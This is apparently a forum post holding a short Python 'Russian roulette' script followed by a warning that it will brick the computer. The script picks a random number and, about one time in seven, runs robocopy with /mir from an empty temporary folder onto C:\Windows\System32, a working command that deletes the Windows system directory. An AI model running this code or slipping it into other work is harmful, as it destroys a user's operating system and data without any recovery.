import random
import subprocess
import tempfile
if random.randint(0, 6) == 1:
with tempfile.TemporaryDirectory() as empty:
subprocess.run(
["robocopy", "/R:0", "/W:0", "/mir", empty, "C:\Windows\System32"]
)
DONT USE THIS CODE IT WILL BRICK YOUR COMUPTER MORE...
This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
By continuing to use this site, you are consenting to our use of cookies.